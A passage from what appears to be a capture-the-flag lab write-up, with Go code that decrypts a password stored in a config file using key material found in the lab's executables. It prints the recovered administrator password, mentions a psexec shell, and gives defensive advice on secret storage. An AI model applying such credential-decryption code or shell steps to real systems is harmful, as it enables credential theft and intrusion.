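	cipher.NewCBCDecrypter(blk, iv).CryptBlocks(pt, ct)
	n := int(pt[len(pt)-1])
	if n == 0 || n > blk.BlockSize() {
		return "", errors.New("bad PKCS7 padding: wrong passphrase, salt, iterations or IV?")
	}
	for _, c := range pt[len(pt)-n:] {
		if int(c) != n {
			return "", errors.New("bad PKCS7 padding: wrong passphrase, salt, iterations or IV?")
		}
	}
	return string(pt[:len(pt)-n]), nil
}

// DecryptConfig parses an RU_config.xml document and decrypts its <Password>.
func DecryptConfig(doc string) (user, password string, err error) {
	var cfg ConfigFile
	if err = xml.Unmarshal([]byte(doc), &cfg); err != nil {
		return "", "", err
	}
	password, err = DecryptLegacySecret(cfg.Password, RUScannerParams)
	return cfg.Username, password, err
}

// ruConfigXML reproduces the RU_config.xml content shown in the post.
const ruConfigXML = `<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>389</Port>
  <Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>`

func main() {
	fmt.Println(DecryptConfig(ruConfigXML))
	fmt.Println(DecryptLegacySecret("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=", HqkLdapParams))
}
```

The point for defenders is that nothing here is a key recovery attack: passphrase, salt, iteration count and IV all ship inside executables that sit on a share readable by a temporary account, so the stored "encrypted" password is, in practice, plaintext to anyone who can read the share. Secrets consumed by a service should come from an ACL-protected store (DPAPI, a credential vault, or a file readable only by the service account), not from a config next to the binary that can decrypt it.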

Armed with the administrator’s password (XtH4nkS4Pl4y1nGX), I guess the end is near. We should be able to get a shell with Impacket’s psexec.

Sweet.

Getting root.txt

Time for the prize, yo!

:dancer:

Afterthoughts

Ain’t nobody got time for the unintended way…